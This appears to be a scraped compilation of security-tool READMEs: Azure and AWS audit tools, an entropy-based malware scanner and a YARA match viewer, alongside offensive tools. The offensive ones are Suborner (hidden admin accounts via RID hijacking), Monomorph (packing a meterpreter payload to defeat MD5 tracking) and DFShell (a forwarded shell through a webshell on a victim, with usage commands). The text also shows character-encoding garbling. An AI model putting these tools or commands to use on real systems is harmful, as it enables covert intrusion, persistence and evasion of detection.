  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Speedup

View more details

โœ…Using Node.js runtime as orchestrator utilises Nodes asynchronous nature allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Managers incredible speed.

โœ…Compared to running requests one-by-one, the speedup can be up to 10x, when Node executes the batch of requests instead of single request at time

Parameters reference

Example:

node ./plugins/main.js --batch=10 --nativescope --roleAssignments --helperTexts=true --checkAad --scanAuditLogs --composites --shuffle --clearTokens
Param Description Default if undefined
--nativescope Currently mandatory parameter no values
--shuffle Can help with throttling. Shuffles the resource list to reduce the possibility of resource provider throttling threshold being met no values
--roleAssignments Checks controls as per microsoft.authorization no values
--includeRG Checks controls with ResourceGroups as per microsoft.authorization no values
--checkAad Checks controls as per microsoft.azureactivedirectory no values
--subInclude Defines subscription scope no default, requires subscriptionID/s, if not defined will enumerate all subscriptions the user have access to
--namespace text filter which matches full, or part of the resource ID
example /microsoft.storage/storageaccounts all storage accounts in the scope
optional parameter
--notIncludes text filter which matches full, or part of the resource ID
example /microsoft.storage/storageaccounts all storage accounts in the scope are excluded
optional parameter
--batch size of batch interval between throttles 5
--wait size of batch interval between throttles 1500
--scanAuditLogs optional parameter. When defined in hours will toggle Azure Activity Log scanning for weak authentication events
defined in: scanAuditLogs
24h
--composites read composite no values
--clearTokens clears tokens in session folder, use this if you get authorization errors, or have just changed to other az login account
use az account clear if you want to clear AZ CLI cache too
no values
--tag Filter all results in the end based on single tag--tag=svc=aksdev no values
--ignorePreCheck use this option when used with browser delegated tokens no values
--helperTexts Will append text descriptions from general to manual controls no values
--reprocess Will update results to existing content.json. Useful for incremental runs no values

Parameters reference for example report:

node templatehelpers/eastReports.js --asb 
Param Description Default if undefined
--asb gets all ASB results available to users no values
--policy gets all Policy results available to users no values
--doc prints pandoc string for export to console no values

(Highly experimental) Running in restricted environments where only browser use is available

Read here Running in restricted environments

Developing controls

Developer guide including control flow description is here dev-guide.md

Updates and examples

Auditing Microsoft.Web provider (Functions and web apps)

โœ…Check roles that are assigned to function managed identity in Azure AD and all Azure Subscriptions the audit account has access to
โœ…Relation mapping, check which keyVaults the function uses across all subs the audit account has access to
โœ…Check if Azure AD authentication is enabled
โœ…Check that generation of access tokens to the api requires assigment .appRoleAssignmentRequired
โœ…Audit bindings
  • Function or Azure AD Authentication enabled
  • Count and type of triggers

โœ…Check if SCM and FTP endpoints are secured


Azure RBAC baseline authorization

โš ๏ธDetect principals in privileged subscriptions roles protected only by password-based single factor authentication.
  • Checks for users without MFA policies applied for set of conditions
  • Checks for ServicePrincipals protected only by password (as opposed to using Certificate Credential, workload federation and or workload identity CA policy)

Maps to App Registration Best Practices

  • An unused credential on an application can result in security breach. While it's convenient to use password. secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application

โœ…State healthy - User result example

{ 
"subscriptionName": "EAST -msdn",
"friendlyName": "joosua@thx138.onmicrosoft.com",
"mfaResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097"
}],
"checkType": "mfa"
},
"basicAuthResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097"
}],
"checkType": "basicAuth"
},
}

โš ๏ธState unHealthy - Application principal example

{ 
"subscriptionName": "EAST - HoneyPot",
"friendlyName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"creds": {
"@odata.context": "https://graph.microsoft.com/beta/$metadata#servicePrincipals(id,displayName,appId,keyCredentials,passwordCredentials,servicePrincipalType)/$entity",
"id": "babec804-037d-4caf-946e-7a2b6de3a45f",
"displayName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"appId": "5af1760e-89ff-46e4-a968-0ac36a7b7b69",
"servicePrincipalType": "Application",
"keyCredentials": [],
"passwordCredentials": [],
"OnlySingleFactor": [{
"customKeyIdentifier": null,
"endDateTime": "2023-10-20T06:54:59.2014093Z",
"keyId": "7df44f81-a52c-4fd6-b704-4b046771f85a",
"startDateTime": "2021-10-20T06:54:59.2014093Z",
"secretText": null,
"hint": nu ll,
"displayName": null
}],
"StrongSingleFactor": []
}
}

Contributing

Following methods work for contributing for the time being:

  1. Submit a pull request with code / documentation change
  2. Submit a issue
    • issue can be a:
    • โš ๏ธProblem (issue)
    • ๏“Feature request
    • โ”Question

Other

  1. By default EAST tries to work with the current depedencies - Introducing new (direct) depedencies is not directly encouraged with EAST. If such vital depedency is introduced, then review licensing of such depedency, and update readme.md - depedencies
    • There is nothing to prevent you from creating your own fork of EAST with your own depedencies


Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks


Self-Service Security Assessment too l

Cybersecurity remains a very important topic and point of concern for many CIOs, CISOs, and their customers. To meet these important concerns, AWS has developed a primary set of services customers should use to aid in protecting their accounts. Amazon GuardDuty, AWS Security Hub, AWS Config, and AWS Well-Architected reviews help customers maintain a strong security posture over their AWS accounts. As more organizations deploy to the cloud, especially if they are doing so quickly, and they have not yet implemented the recommended AWS Services, there may be a need to conduct a rapid security assessment of the cloud environment.

With that in mind, we have worked to develop an inexpensive, easy to deploy, secure, and fast solution to provide our customers two (2) security assessment reports. These security assessments are from the open source projects โ€œProwlerโ€ and โ€œScoutSuite.โ€ Each of these projects conduct an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customerโ€™s deployed environment. If you are interested in conducting these assessments on a continuous basis, AWS recommends enabling Security Hubโ€™s Foundational Security Best P ractices standard. If you are interested in integrating your Prowler assessment results with Security Hub, you can also do that from Prowler natively following instructions here.

In addition, we have developed custom modules that speak to customer concerns around threats and misconfigurations of those issues, currently this includes checks for ransomware specific findings.


ARCHITECTURE OVERVIEW

Overview - Open Source project checks

The architecture we deploy is a very simple VPC with two (2) subnets, one (1) NAT Gateway, one (1) EC2 instance, and one (1) S3 Bucket. The EC2 instance is using Amazon Linux 2 (the latest published AMI), that is patched on boot, pulls down the two projects (Prowler and ScoutSuite), runs the assessments and then delivers the reports to the S3 Bucket. The EC2 instances does not deploy with any EC2 Key Pair, does not have any open ingress rules on its Security Group, and is placed in the Private Subnet so it does not have direct internet access. After completion of the assessment and the delivery of the reports the system can be terminated.

The deployment is accomplished through the use of CloudFormation. A single CloudFormation template is used to launch a few other templates (in a modular approach). No parameters (user input) is required and the automated build out of the environment will take on average less than 10 minutes to complete. These templates are provided for review in this Github repository.

Once the EC2 Instance has been created and begins, the two assessments it will take somewhere around 40 minutes to complete. At the end of the assessments and after the two reports are delivered to the S3 Bucket the Instance will automatically shutdown, You may at this time safely terminate the Instance.

How to deploy this tool

How do I read the reports?

Diagram

Here is a diagram of the architecture.

What will be created

  • A VPC

    • This will be a /26 for the VPC
    • This will include 2 subnets both in the same Availability Zone, one Public and one Private
    • This will include the required Route Tables and ACLs
  • An EIP

    • For use by the NAT Gateway
  • A NAT Gateway

    • This is required for the instance to download both Prowler and ScoutSuite as well as to make the API Calls
  • A Security Group

    • For the Instance
  • A single m5a.large instance with a 10 GB gp2 EBS volume

    • This is the instance in which Prowler and ScoutSuite will run
    • It will be in a Private Subnet
    • It will not have an EC2 Key Pair
    • It will not allow ingress traffic on the Security Group
  • An Instance Role

    • This Role is required so that Prowler and ScoutSuite can run the API calls from the EC2 Instance
  • An IAM Policy

    • Some IAM permissions are required for Prowler and ScoutSuite
      • Prowler info here
      • ScoutSuite info here
  • An S3 Bucket

    • This is the location where the reports will be delivered
    • It will take about 40 minutes for the reports to show up

Open source security Assessments

These security assessments are from the open source projects โ€œProwlerโ€ and โ€œScoutSuite.โ€ Each of these projects conduct an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customerโ€™s deployed environment.

1. Prowler

The first assessment is from Prowler.

  • Prowler follows guidelines of the CIS Amazon Web Services Foundations Benchmark (49 checks) and has 40 additional checks including related to GDPR and HIPAA, in total Prowler offers over 160 checks.

2. ScoutSuite

The second assessment is from ScoutSuite

  • ScoutSuite has been around since 2012, originally a Scout, then Scout2, and now ScoutSuite. This will provide a set of files that can be viewed in your browser and conducts a wide range of checks

Overiew of optional modules

โ–บ Check for Common Security Mistakes module

When enabled, this module will deploy a lambda function that checks for common security mistakes highlighted in https://www.youtube.com/watch?v=tmuClE3nWlk.

What will be created

A Lambda function that will perform the checks. Some of the checks include:

  • GuardDuty set to alert on findings
  • GuardDuty enabled across all regions
  • Prevent accidental key deletion
  • Existence of a Multi-region CloudTrail
  • CloudTrail validation enabled
  • No local IAM users
  • Roles tuned for least privilege in last 90 days
  • Alerting for root account use
  • Alerting for local IAM user create/delete
  • Use of Managed Prefix Lists in Security Groups
  • Public S3 Buckets

โ–บ Ransomware modules

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for ransomware infection and susceptibility to ransomware damage.

What will be created

  • AWS Core security services enabled
    • Checks for AWS security service enablement in all regions where applicable (GuardDuty, SecurityHub)
  • Data protection checks
    • Checks for EBS volumes with no snapshot
    • Checks for outdated OS running
    • Checks for S3 bucket replication JobStatus
    • Checks for EC2 instances that can not be managed with SSM
    • Checks for Stale IAM roles that have been granted S3 access but have not used them in the last 60 days
    • Checks for S3 deny public access enablement
    • Checks to see if DNSSEC is enabled for public hosted zones in Amazon Route 53
    • Checks to see if logging is enabled for services relevant to ransomware (i.e. CloudFront, Lambda, Route53 Query Logging, and Route 53 Resolver Logging).
    • Checks to see if Route 53 Resolver DNS Firewall is enabled across all relevant regions
    • Checks to see if there are any Access Keys that have not been used in last 90 days

โ–บ SolarWinds module

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for SolarWinds vulnerability. The checks are based on CISA Alert AA20-352A from Appendix A & B.

Note: Prior to enablement of this module, please read the module documentation which reviews the steps that need to be completed prior to using this module.

Note: This module MUST be run separately as its own stack, select the S3 URL SelfServiceSecSolar.yml to deploy

What will be created

  • Athena query - AA20352A IP IOC
    • This Athena query will scan your VPC flow logs for IP addresses from the CISA AA20-352A.
  • SSM Automation document - SolorWindsAA20-352AAutomatedScanner
    • This is a systems manager automation document that will scan Windows EC2 instances for impacted .dll files from CISA AA20-352A.
  • Route53 DNS resolver query - AA20352A DNS IOC
    • This Athena query will scan your DNS logs for customers that have enabled DNS query logging

Frequently Asked Questions (FAQ)

  1. Is there a cost?
    • Yes. This should normally cost less than $1 for an hour of use.
  2. Is this a continuous monitoring and reporting tool?
    • No. This is a one-time assessment, we urge customers to leverage tooling like AWS SecurityHub for Ongoing assessments.
  3. Why does the CloudFormation service error when deleting the stack?
    • You must remove the objects (reports) out of the S3 bucket first
  4. Does this integrate with GuardDuty, Security Hub, CloudWatch, etc.?
    • Not at this time. In a future sprint we plan to incorporate integration with AWS services like Security Hub and GuardDuty. However, you can follow the instructions in this blog to integrate Prowler and Security Hub.
  5. How do I remediate the issues in the reports?
    • Generally, the issues should be described in the report with readily identifiable corrections. Please follow up with the public documentation for each tool (Prowler and ScoutSuite) as well. If this is insufficient, please reach out to your AWS Account team and we will be more than happy to help you understand the reports and work towards remediating issues.

Security

See CONTRIBUTING for more information.

License

This project is licensed under the Apache-2.0 License.



Suborner - The Invisible Account Forger


What's this?

A simple program to create a Windows account you will only know about :)

  • Create invisible local accounts without net user or Windows OS user management applications (e.g. netapi32::netuseradd)
  • Works on all Windows NT Machines (Windows XP to 11, Windows Server 2003 to 2022)
  • Impersonate through RID Hijacking any existing account (enabled or disabled) after a successful authentication

Create an invisible machine account with administrative privileges, and without invoking that annoying Windows Event Logger to report its creation!


Where can I see more?

Released at Black Hat USA 2022: Suborner: A Windows Bribery for Invisible Persistence

How can I use this?

Build

  • Make sure you have .NET 4.0 and Visual Studio 2019
  • Clone this repo: git clone https://github.com/r4wd3r/Suborner/
  • Open the .sln with Visual Studio
  • Build x86, x64 or both versions
  • Bribe Windows!

Release

Download the latest release and pwn!

Usage

Thanks!

This attack would not have been possible without the great research done by:

What's next?

Hack Suborn the planet!



Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•
โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•โ•”โ•โ•— โ• โ•โ•—
โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ• โ•โ•โ•โ•ฉ โ•ฉโ•
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ•
By Retr0id

โ•โ•โ• MD5-Monomorphic Shellcode Packer โ• โ•โ•


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.



Sandfly-Entropyscan - Tool To Detect Packed Or Encrypt ed Binaries Related To Malware, Finds Malicious Files And Linux Processes And Gives Output With Cryptographic Hashes


What is sandfly-entropyscan?

sandfly-entropyscan is a utility to quickly scan files or running processes and report on their entropy (measure of randomness) and if they are a Linux/Unix ELF type executable. Some malware for Linux is packed or encrypted and shows very high entropy. This tool can quickly find high entropy executable files and processes which often are malicious.


Features

  • Written in Golang and is portable across multiple architectures with no modifications.
  • Standalone binary requires no dependencies and can be used instanly without loading any libraries on suspect machines.
  • Not affected by LD_PRELOAD style rootkits that are cloaking files.
  • Built-in PID busting to find hidden/cloaked processes from certain types of Loadable Kernel Module (LKM) rootkits.
  • Generates entropy and also MD5, SHA1, SHA256 and SHA512 hash values of files.
  • Can be used in scanning scripts to find problems automatically.
  • Can be used by incident responders to quickly scan and zero in on potential malware on a Linux host.

Why Scan for Entropy?

Entropy is a measure of randomness. For binary data 0.0 is not-random and 8.0 is perfectly random. Good crypto looks like random white noise and will be near 8.0. Good compression removes redundant data making it appear more random than if it was uncompressed and usually will be 7.7 or above.

A lot of malware executables are packed to avoid detection and make reverse engineering harder. Most standard Linux binaries are not packed because they aren't trying to hide what they are. Searching for high entropy files is a good way to find programs that could be malicious just by having these two attributes of high entropy and executable.

How Do I Use This?

Usage of sandfly-entropyscan:

-csv output results in CSV format (filename, path, entropy, elf_file [true|false], MD5, SHA1, SHA256, SHA512)

-delim change the default delimiter for CSV files of "," to one of your choosing ("|", etc.)

-dir string directory name to analyze

-file string full path to a single file to analyze

-proc check running processes (defaults to ELF only check)

-elf only check ELF executables

-entropy float show any file/process with entropy greater than or equal to this value (0.0 min - 8.0 max, defaults 0 to show all files)

-version show version and exit

Examples

Search for any file that is executable under /tmp:

sandfly-entropyscan -dir /tmp -elf

Search for high entropy (7.7 and higher) executables (often packed or encrypted) under /var/www:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Generates entropy and cryptographic hashes of all running processes in CSV format:

sandfly-entropyscan -proc -csv

Search for any process with an entropy higher than 7.7 indicating it is likely packed or encrypted:

sandfly-entropyscan -proc -entropy 7.7

Generate entropy and cryptographic hash values of all files under /bin and output to CSV format (for instance to save and compare hashes):

sandfly-entropyscan -dir /bin -csv

Scan a directory for all files (ELF or not) with entropy greater than 7.7: (potentially large list of files that are compressed, png, jpg, object files, etc.)

sandfly-entropyscan -dir /path/to/dir -entropy 7.7

Quickly check a file and generate entropy, cryptographic hashes and show if it is executable:

sandfly-entropyscan -file /dev/shm/suspicious_file

Use Cases

Do spot checks on systems you think have a malware issue. Or you can automate the scan so you will get an output if we find something show up that is high entropy in a place you didn't expect. Or simply flag any executable ELF type file that is somewhere strange (e.g. hanging out in /tmp or under a user's HTML directory). For instance:

Did a high entropy binary show up under the system /var/www directory? Could be someone put a malware dropper on your website:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Setup a cron task to scan your /tmp, /var/tmp, and /dev/shm directories for any kind of executable file whether it's high entropy or not. Executable files under tmp directories can frequently be a malware dropper.

sandfly-entropyscan -dir /tmp -elf

sandfly-entropyscan -dir /var/tmp -elf

sandfly-entropyscan -dir /dev/shm -elf

Setup another cron or automated security sweep to spot check your systems for highly compressed or encrypted binaries that are running:

sandfly-entropyscan -proc -entropy 7.7

Build

git clone https://github.com/sandflysecurity/sandfly-entropyscan.git

  • Go into the repo directory and build it:

go build

  • Run the binary with your options:

./sandfly-entropyscan

Build Scripts

There are a some basic build scripts that build for various platforms. You can use these to build or modify to suit. For Incident Responders, it might be useful to keep pre-compiled binaries ready to go on your investigation box.

build.sh - Build for current OS you're running on when you execute it.

ELF Detection

We use a simple method for seeing if a file may be an executable ELF type. We can spot ELF format files for multiple platforms. Even if malware has Intel/AMD, MIPS and Arm dropper binaries we will still be able to spot all of them.

False Positives

It's possible to flag a legitimate binary that has a high entropy because of how it was compiled, or because it was packed for legitimate reasons. Other files like .zip, .gz, .png, .jpg and such also have very high entropy because they are compressed formats. Compression removes redundancy in a file which makes it appear to be more random and has higher entropy.

On Linux, you may find some kinds of libraries (.so files) get flagged if you scan library directories.

However, it is our experience that executable binaries that also have high entropy are often malicious. This is especially true if you find them in areas where executables normally shouldn't be (such as again tmp or html directories).

Performance

The entropy calculation requires reading in all the bytes of the file and tallying them up to get a final number. It can use a lot of CPU and disk I/O, especially on very large file systems or very large files. The program has an internal limit where it won't calculate entropy on any file over 2GB, nor will it try to calculate entropy on any file that is not a regular file type (e.g. won't try to calculate entropy on devices like /dev/zero).

Then we calculate MD5, SHA1, SHA256 and SHA512 hashes. Each of these requires going over the file as well. It's reasonable speed on modern systems, but if you are crawling a very large file system it can take some time to complete.

If you tell the program to only look at ELF files, then the entropy/hash calculations won't happen unless it is an ELF type and this will save a lot of time (e.g. it will ignore massive database files that aren't executable).

If you want to automate this program, it's best to not have it crawl the entire root file system unless you want that specifically. A targeted approach will be faster and more useful for spot checks. Also, use the ELF flag as that will drastically reduce search times by only processing executable file types.

Incident Response

For incident responders, running sandfly-entropyscan against the entire top-level "/" directory may be a good idea just to quickly get a list of likely packed candidates to investigate. This will spike CPU and disk I/O. However, you probably don't care at that point since the box has been mining cryptocurrency for 598 hours anyway by the time the admins noticed.

Again, use the ELF flag to get to the likely problem candidate executables and ignore the noise.

Testing

There is a script called scripts/testfiles.sh that will make two files. One will be full of random data and one will not be random at all. When you run the script it will make the files and run sandfly-entropyscan in executable detection mode. You should see two files. One with very high entropy (at or near 8.0) and one full of non-random data that should be at 0.00 for low entropy. Example:

./testfiles.sh

Creating high entropy random executable-like file in current directory.

Creating low entropy executable-like file in current directory.

high.entropy.test, entropy: 8.00, elf: true

low.entropy.test, entropy: 0.00, elf: true

You can also load up the upx utility and compress an executable and see what values it returns.

Agentless Linux Security

Sandfly Security produces an agentless endpoint detection and incident response platform (EDR) for Linux. Automated entropy checks are just one of thousands of things we search for to find intruders without loading any software on your Linux endpoints.

Get a free license and learn more below:

https://www.sandflysecurity.com @SandflySecurity



DFShell - The Best Forwarded Shell


โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•—     
โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ•”โ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘
โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘
โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ• โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ• โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•

D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.

In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code


Why you should use DFShell?

To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.

*If you change the actual user from webshell (or anything get unstable) then execute: 'sh'*

Installation:

Install with pip

pip3 install dfshell

Install from source

git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements

One-liner

git clone https://github.com/D3Ext/DFShell && cd DFShell && pip3 install -r requirements

Usage:

It's simple, you pass the url of the webshell and the parameter that executes commands. I recommend you the most simple webshell

python3 DFShell.py -u http://10.10.10.10/webshell.php -p cmd

Demo:



Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors


Visually inspect all of the regex matches (and their sexier, more cloak and dagger cousins, the YARA matches) found in binary data and/or text. See what happens when you force various character encodings upon those matched bytes. With colors.


Quick Start

pipx install yaralyzer

# Scan against YARA definitions in a file:
yaralyze --yara-rules /secret/vault/sigmunds_malware_rules.yara lacan_buys_the_dip.pdf

# Scan against an arbitrary regular expression:
yaralyze --regex-pattern 'good and evil.*of\s+\w+byte' the_crypto_archipelago.exe

# Scan against an arbitrary YARA hex pattern
yaralyze --hex-pattern 'd0 93 d0 a3 d0 [-] 9b d0 90 d0 93' one_day_in_the_life_of_ivan_cryptosovich.bin

What It Do

  1. See the actual bytes your YARA rules are matching. No more digging around copy/pasting the start positions reported by YARA into your favorite hex editor. Displays both the bytes matched by YARA as well as a configurable number of bytes before and after each match in hexadecimal and "raw" python string representation.
  2. Do the same for byte patterns and regular expressions without writing a YARA file. If you're too lazy to write a YARA file but are trying to determine, say, whether there's a regular expression hidden somewhere in the file you could scan for the pattern '/.+/' and immediately get a window into all the bytes in the file that live between front slashes. Same story for quotes, BOMs, etc. Any regex YARA can handle is supported so the sky is the limit.
  3. Detect the possible encodings of each set of matched bytes. The chardet library is a sophisticated library for guessing character encodings and it is leveraged here.
  4. Display the result of forcing various character encodings upon the matched areas. Several default character encodings will be forcibly attempted in the region around the match. chardet will also be leveraged to see if the bytes fit the pattern of any known encoding. If chardet is confident enough (configurable), an attempt at decoding the bytes using that encoding will be displayed.
  5. Export the matched regions/decodings to SVG, HTML, and colored text files. Show off your ASCII art.

Why It Do

The Yaralyzer's functionality was extracted from The Pdfalyzer when it became apparent that visualizing and decoding pattern matches in binaries had more utility than just in a PDF analysis tool.

YARA, for those who are unaware1, is branded as a malware analysis/alerting tool but it's actually both a lot more and a lot less than that. One way to think about it is that YARA is a regular expression matching engine on steroids. It can locate regex matches in binaries like any regex engine but it can also do far wilder things like combine regexes in logical groups, compare regexes against all 256 XORed versions of a binary, check for base64 and other encodings of the pattern, and more. Maybe most importantly of all YARA provides a standard text based format for people to share their 'roided regexes with the world. All these features are particularly useful when analyzing or reverse engineering malware, whose authors tend to invest a great deal of time into making stuff hard to find.

But... that's also all YARA does. Everything else is up to the user. YARA's just a match engine and if you don't know what to match (or even what character encoding you might be able to match in) it only gets you so far. I found myself a bit frustrated trying to use YARA to look at all the matches of a few critical patterns:

  1. Bytes between escaped quotes (\".+\" and \'.+\')
  2. Bytes between front slashes (/.+/). Front slashes demarcate a regular expression in many implementations and I was trying to see if any of the bytes matching this pattern were actually regexes.

YARA just tells you the byte position and the matched string but it can't tell you whether those bytes are UTF-8, UTF-16, Latin-1, etc. etc. (or none of the above). I also found myself wanting to understand what was going in the region of the matched bytes and not just in the matched bytes. In other words I wanted to scope the bytes immediately before and after whatever got matched.

Enter The Yaralyzer, which lets you quickly scan the regions around matches while also showing you what those regions would look like if they were forced into various character encodings.

It's important to note that The Yaralyzer isn't a full on malware reversing tool. It can't do all the things a tool like CyberChef does and it doesn't try to. It's more intended to give you a quick visual overview of suspect regions in the binary so you can hone in on the areas you might want to inspect with a more serious tool like CyberChef.

Installation

Install it with pipx or pip3. pipx is a marginally better solution as it guarantees any packages installed with it will be isolated from the rest of your local python environment. Of course if you don't really have a local python environment this is a moot point and you can feel free to install with pip/pip3.

pipx install yaralyzer

Usage

Run yaralyze -h to see the command line options (screenshot below).

For info on exporting SVG images, HTML, etc., see Example Output.

Configuration

If you place a filed called .yaralyzer in your home directory or the current working directory then environment variables specified in that .yaralyzer file will be added to the environment each time yaralyzer is invoked. This provides a mechanism for permanently configuring various command line options so you can avoid typing them over and over. See the example file .yaralyzer.example to see which options can be configured this way.

Only one .yaralyzer file will be loaded and the working directory's .yaralyzer takes precedence over the home directory's .yaralyzer.

As A Library

Yaralyzer is the main class. It has a variety of constructors supporting:

  1. Precompiled YARA rules
  2. Creating a YARA rule from a string
  3. Loading YARA rules from files
  4. Loading YARA rules from all .yara file in a directory
  5. Scanning bytes
  6. Scanning a file

Should you want to iterate over the BytesMatch (like a re.Match object for a YARA match) and BytesDecoder (tracks decoding attempt stats) objects returned by The Yaralyzer, you can do so like this:

from yaralyzer.yaralyzer import Yaralyzer

yaralyzer = Yaralyzer.for_rules_files(['/secret/rule.yara'], 'lacan_buys_the_dip.pdf')

for bytes_match, bytes_decoder in yaralyzer.match_iterator():
do_stuff()

Example Output

The Yaralyzer can export visualizations to HTML, ANSI colored text, and SVG vector images using the file export functionality that comes with Rich. SVGs can be turned into png format images with a tool like Inkscape or cairosvg. In our experience they both work though we've seen some glitchiness with cairosvg.

PyPi Users: If you are reading this document on PyPi be aware that it renders a lot better over on GitHub. Pretty pictures, footnotes that work, etc.

Raw YARA match result:

Display hex, raw python string, and various attempted decodings of both the match and the bytes before and after the match (configurable):

Bonus: see what chardet.detect() thinks about the likelihood your bytes are in a given encoding/language:

TODO

  • highlight decodes done at chardets behest
  • deal with repetitive matches


SSTImap - Automatic SSTI Detection Tool With Interactive Interface

ย 

